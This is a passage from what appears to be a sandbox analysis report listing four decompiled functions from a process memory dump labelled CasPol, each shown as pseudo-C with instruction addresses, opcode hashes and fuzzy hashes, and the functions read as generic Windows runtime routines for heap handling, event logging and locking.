                                                                                                                                                                                                                                                                                                Function 017A7016 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                                                                			E017A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x181d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E017A6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E017A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01747D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01769AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return L0176B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01744620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                                                                                                                                                                                                                0x017a7016
                                                                                                                                                                                                                                                                                                0x017a701e
                                                                                                                                                                                                                                                                                                0x017a702b
                                                                                                                                                                                                                                                                                                0x017a7033
                                                                                                                                                                                                                                                                                                0x017a7037
                                                                                                                                                                                                                                                                                                0x017a703c
                                                                                                                                                                                                                                                                                                0x017a703e
                                                                                                                                                                                                                                                                                                0x017a7041
                                                                                                                                                                                                                                                                                                0x017a7045
                                                                                                                                                                                                                                                                                                0x017a704a
                                                                                                                                                                                                                                                                                                0x017a7050
                                                                                                                                                                                                                                                                                                0x017a7055
                                                                                                                                                                                                                                                                                                0x017a705a
                                                                                                                                                                                                                                                                                                0x017a7062
                                                                                                                                                                                                                                                                                                0x017a7062
                                                                                                                                                                                                                                                                                                0x017a705a
                                                                                                                                                                                                                                                                                                0x017a7064
                                                                                                                                                                                                                                                                                                0x017a7064
                                                                                                                                                                                                                                                                                                0x017a7067
                                                                                                                                                                                                                                                                                                0x017a7071
                                                                                                                                                                                                                                                                                                0x017a7096
                                                                                                                                                                                                                                                                                                0x017a709b
                                                                                                                                                                                                                                                                                                0x017a70a2
                                                                                                                                                                                                                                                                                                0x017a70a6
                                                                                                                                                                                                                                                                                                0x017a70a7
                                                                                                                                                                                                                                                                                                0x017a70ad
                                                                                                                                                                                                                                                                                                0x017a70b3
                                                                                                                                                                                                                                                                                                0x017a70b6
                                                                                                                                                                                                                                                                                                0x017a70bb
                                                                                                                                                                                                                                                                                                0x017a70c3
                                                                                                                                                                                                                                                                                                0x017a70c3
                                                                                                                                                                                                                                                                                                0x017a70c6
                                                                                                                                                                                                                                                                                                0x017a70cd
                                                                                                                                                                                                                                                                                                0x017a70dd
                                                                                                                                                                                                                                                                                                0x017a70e0
                                                                                                                                                                                                                                                                                                0x017a70e2
                                                                                                                                                                                                                                                                                                0x017a70e2
                                                                                                                                                                                                                                                                                                0x017a70ee
                                                                                                                                                                                                                                                                                                0x017a7101
                                                                                                                                                                                                                                                                                                0x017a70f0
                                                                                                                                                                                                                                                                                                0x017a70f9
                                                                                                                                                                                                                                                                                                0x017a70f9
                                                                                                                                                                                                                                                                                                0x017a710a
                                                                                                                                                                                                                                                                                                0x017a710e
                                                                                                                                                                                                                                                                                                0x017a7112
                                                                                                                                                                                                                                                                                                0x017a7117
                                                                                                                                                                                                                                                                                                0x017a7118
                                                                                                                                                                                                                                                                                                0x017a7118
                                                                                                                                                                                                                                                                                                0x017a70bb
                                                                                                                                                                                                                                                                                                0x017a711d
                                                                                                                                                                                                                                                                                                0x017a7123
                                                                                                                                                                                                                                                                                                0x017a7131
                                                                                                                                                                                                                                                                                                0x017a7131
                                                                                                                                                                                                                                                                                                0x017a7136
                                                                                                                                                                                                                                                                                                0x017a713d
                                                                                                                                                                                                                                                                                                0x017a713e
                                                                                                                                                                                                                                                                                                0x017a713f
                                                                                                                                                                                                                                                                                                0x017a714a
                                                                                                                                                                                                                                                                                                0x017a714a
                                                                                                                                                                                                                                                                                                0x017a7084
                                                                                                                                                                                                                                                                                                0x017a7088
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a708e
                                                                                                                                                                                                                                                                                                0x017a708e
                                                                                                                                                                                                                                                                                                0x017a7092
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a7092

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 78b719c020cfee1818b570cbdc9dc178f16c313a8490e8cb3150ffa0c9792bea
                                                                                                                                                                                                                                                                                                • Instruction ID: 6968af2f69109025f6f825f3a5273027241149ff5d9ffb78431d4da4cfc0b717
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78b719c020cfee1818b570cbdc9dc178f16c313a8490e8cb3150ffa0c9792bea
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9731BF726047919BC324DF28C844A6BF7E9BFC8700F444A29F99587694E731E904CBA6
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017561A0 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                                			E017561A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = L01755E50(0x17067cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E017F9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						L0172F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                                                                                                                                                                                                                                0x017561b3
                                                                                                                                                                                                                                                                                                0x017561b5
                                                                                                                                                                                                                                                                                                0x017561bd
                                                                                                                                                                                                                                                                                                0x017561c3
                                                                                                                                                                                                                                                                                                0x017561c7
                                                                                                                                                                                                                                                                                                0x017561d2
                                                                                                                                                                                                                                                                                                0x017561ff
                                                                                                                                                                                                                                                                                                0x017561ff
                                                                                                                                                                                                                                                                                                0x01756201
                                                                                                                                                                                                                                                                                                0x01756207
                                                                                                                                                                                                                                                                                                0x01756207
                                                                                                                                                                                                                                                                                                0x017561d4
                                                                                                                                                                                                                                                                                                0x017561d9
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017561df
                                                                                                                                                                                                                                                                                                0x017561e2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017561e6
                                                                                                                                                                                                                                                                                                0x017561e8
                                                                                                                                                                                                                                                                                                0x017561ee
                                                                                                                                                                                                                                                                                                0x017561ee
                                                                                                                                                                                                                                                                                                0x017561f9
                                                                                                                                                                                                                                                                                                0x0179762f
                                                                                                                                                                                                                                                                                                0x01797632
                                                                                                                                                                                                                                                                                                0x01797635
                                                                                                                                                                                                                                                                                                0x01797639
                                                                                                                                                                                                                                                                                                0x01797640
                                                                                                                                                                                                                                                                                                0x0179766e
                                                                                                                                                                                                                                                                                                0x01797675
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01797681
                                                                                                                                                                                                                                                                                                0x01797689
                                                                                                                                                                                                                                                                                                0x0179768d
                                                                                                                                                                                                                                                                                                0x01797691
                                                                                                                                                                                                                                                                                                0x01797695
                                                                                                                                                                                                                                                                                                0x01797699
                                                                                                                                                                                                                                                                                                0x017976af
                                                                                                                                                                                                                                                                                                0x017976b5
                                                                                                                                                                                                                                                                                                0x017976b7
                                                                                                                                                                                                                                                                                                0x017976b7
                                                                                                                                                                                                                                                                                                0x017976d7
                                                                                                                                                                                                                                                                                                0x017976dc
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017976dc
                                                                                                                                                                                                                                                                                                0x017976a2
                                                                                                                                                                                                                                                                                                0x017976a9
                                                                                                                                                                                                                                                                                                0x01797651
                                                                                                                                                                                                                                                                                                0x01797653
                                                                                                                                                                                                                                                                                                0x01797653
                                                                                                                                                                                                                                                                                                0x01797656
                                                                                                                                                                                                                                                                                                0x01797656
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01797656
                                                                                                                                                                                                                                                                                                0x01797644
                                                                                                                                                                                                                                                                                                0x01797646
                                                                                                                                                                                                                                                                                                0x01797648
                                                                                                                                                                                                                                                                                                0x01797648
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 41ef44640cbc1ec26960e0c5832df524206549f4397a46dd8e27b5ae3d44a8bf
                                                                                                                                                                                                                                                                                                • Instruction ID: b30e37d06d1f3b6cae89df6f7879af517a19e463b5d469831c7a2af4ac2f94f0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41ef44640cbc1ec26960e0c5832df524206549f4397a46dd8e27b5ae3d44a8bf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C3159716197018FE764CF1DC840B26FBE4BB88B10F45496DFA989B351E7B0E804CBA1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0172AA16 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                                                                			E0172AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x181d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1817b9c; // 0x0
					_t53 = L01744620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return L0176B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0176F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01736C59(_t53, _t51, _t58) != 0) {
							_t28 = L01755E50(0x170c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0175B230(_v32, _v28, 0x170c2d8, 1,  &_v24);
								_t28 = L0172F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                                                                                                                                                                                                                0x0172aa25
                                                                                                                                                                                                                                                                                                0x0172aa29
                                                                                                                                                                                                                                                                                                0x0172aa2d
                                                                                                                                                                                                                                                                                                0x0172aa30
                                                                                                                                                                                                                                                                                                0x0172aa37
                                                                                                                                                                                                                                                                                                0x0172aa3c
                                                                                                                                                                                                                                                                                                0x01784458
                                                                                                                                                                                                                                                                                                0x01784458
                                                                                                                                                                                                                                                                                                0x01784472
                                                                                                                                                                                                                                                                                                0x01784474
                                                                                                                                                                                                                                                                                                0x01784476
                                                                                                                                                                                                                                                                                                0x0172aa64
                                                                                                                                                                                                                                                                                                0x0172aa74
                                                                                                                                                                                                                                                                                                0x0178447c
                                                                                                                                                                                                                                                                                                0x01784483
                                                                                                                                                                                                                                                                                                0x01784492
                                                                                                                                                                                                                                                                                                0x0172aa52
                                                                                                                                                                                                                                                                                                0x0172aa54
                                                                                                                                                                                                                                                                                                0x0172aa5e
                                                                                                                                                                                                                                                                                                0x017844a8
                                                                                                                                                                                                                                                                                                0x017844ad
                                                                                                                                                                                                                                                                                                0x017844af
                                                                                                                                                                                                                                                                                                0x017844b6
                                                                                                                                                                                                                                                                                                0x017844b6
                                                                                                                                                                                                                                                                                                0x017844b9
                                                                                                                                                                                                                                                                                                0x017844bc
                                                                                                                                                                                                                                                                                                0x017844cd
                                                                                                                                                                                                                                                                                                0x017844d3
                                                                                                                                                                                                                                                                                                0x017844d6
                                                                                                                                                                                                                                                                                                0x017844e1
                                                                                                                                                                                                                                                                                                0x017844e1
                                                                                                                                                                                                                                                                                                0x017844e6
                                                                                                                                                                                                                                                                                                0x017844e8
                                                                                                                                                                                                                                                                                                0x017844fb
                                                                                                                                                                                                                                                                                                0x017844fb
                                                                                                                                                                                                                                                                                                0x017844e8
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0172aa5e
                                                                                                                                                                                                                                                                                                0x01784476
                                                                                                                                                                                                                                                                                                0x0172aa42
                                                                                                                                                                                                                                                                                                0x0172aa46
                                                                                                                                                                                                                                                                                                0x0172aa48
                                                                                                                                                                                                                                                                                                0x0172aa4c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 262a95f6951970ad6a1b2a2ee08848fab84e33c7c0fb8b95c2b994f23ba03fce
                                                                                                                                                                                                                                                                                                • Instruction ID: 1e2be5f3181bb31171257b8764bae059bf2d8b1fcfd84cc2a2b2072d05cd6f4a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 262a95f6951970ad6a1b2a2ee08848fab84e33c7c0fb8b95c2b994f23ba03fce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8231C3B2A0022AABCF11AF69CD41A7FF7B9FF14700B014469F905E7254E774AA11DBA1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01729100 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                                                                			E01729100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x17ff6e8);
				E0177D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E017F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0177D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x18186c0; // 0x11607b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x18186b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01742280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E017F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							L0176AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x181b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x18184c0;
										if(_t69 >=  *0x18184c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E017F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0172922A(_t82);
							_t53 = E01747D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E017F8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x18186c0; // 0x11607b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x18186b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x18186bc;
										_t72 = 0x18186b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01729240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x18186c4;
									_t72 = 0x18186c0;
									L18:
									E01759B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                                                                                                                                                                                                                                0x01729100
                                                                                                                                                                                                                                                                                                0x01729100
                                                                                                                                                                                                                                                                                                0x01729100
                                                                                                                                                                                                                                                                                                0x01729100
                                                                                                                                                                                                                                                                                                0x01729102
                                                                                                                                                                                                                                                                                                0x01729107
                                                                                                                                                                                                                                                                                                0x0172910c
                                                                                                                                                                                                                                                                                                0x01729110
                                                                                                                                                                                                                                                                                                0x01729115
                                                                                                                                                                                                                                                                                                0x01729136
                                                                                                                                                                                                                                                                                                0x01729143
                                                                                                                                                                                                                                                                                                0x017837e4
                                                                                                                                                                                                                                                                                                0x017837e4
                                                                                                                                                                                                                                                                                                0x01729149
                                                                                                                                                                                                                                                                                                0x0172914e
                                                                                                                                                                                                                                                                                                0x0172914e
                                                                                                                                                                                                                                                                                                0x01729117
                                                                                                                                                                                                                                                                                                0x0172911d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0172911f
                                                                                                                                                                                                                                                                                                0x01729125
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729151
                                                                                                                                                                                                                                                                                                0x01729158
                                                                                                                                                                                                                                                                                                0x0172915d
                                                                                                                                                                                                                                                                                                0x01729161
                                                                                                                                                                                                                                                                                                0x01729168
                                                                                                                                                                                                                                                                                                0x01783715
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0172916e
                                                                                                                                                                                                                                                                                                0x0172916e
                                                                                                                                                                                                                                                                                                0x01729175
                                                                                                                                                                                                                                                                                                0x01729177
                                                                                                                                                                                                                                                                                                0x0172917e
                                                                                                                                                                                                                                                                                                0x0172917f
                                                                                                                                                                                                                                                                                                0x01729182
                                                                                                                                                                                                                                                                                                0x01729182
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x0172918a
                                                                                                                                                                                                                                                                                                0x0172918d
                                                                                                                                                                                                                                                                                                0x0172918f
                                                                                                                                                                                                                                                                                                0x01729192
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x01729198
                                                                                                                                                                                                                                                                                                0x01729198
                                                                                                                                                                                                                                                                                                0x01729198
                                                                                                                                                                                                                                                                                                0x0172919a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178371f
                                                                                                                                                                                                                                                                                                0x01783721
                                                                                                                                                                                                                                                                                                0x01783727
                                                                                                                                                                                                                                                                                                0x0178372f
                                                                                                                                                                                                                                                                                                0x01783733
                                                                                                                                                                                                                                                                                                0x01783735
                                                                                                                                                                                                                                                                                                0x01783738
                                                                                                                                                                                                                                                                                                0x0178373b
                                                                                                                                                                                                                                                                                                0x0178373d
                                                                                                                                                                                                                                                                                                0x01783740
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783746
                                                                                                                                                                                                                                                                                                0x01783749
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178374f
                                                                                                                                                                                                                                                                                                0x01783751
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783757
                                                                                                                                                                                                                                                                                                0x01783759
                                                                                                                                                                                                                                                                                                0x0178375c
                                                                                                                                                                                                                                                                                                0x0178375c
                                                                                                                                                                                                                                                                                                0x0178375e
                                                                                                                                                                                                                                                                                                0x0178375e
                                                                                                                                                                                                                                                                                                0x01783761
                                                                                                                                                                                                                                                                                                0x01783764
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783766
                                                                                                                                                                                                                                                                                                0x01783768
                                                                                                                                                                                                                                                                                                0x017837a3
                                                                                                                                                                                                                                                                                                0x017837a3
                                                                                                                                                                                                                                                                                                0x017837a5
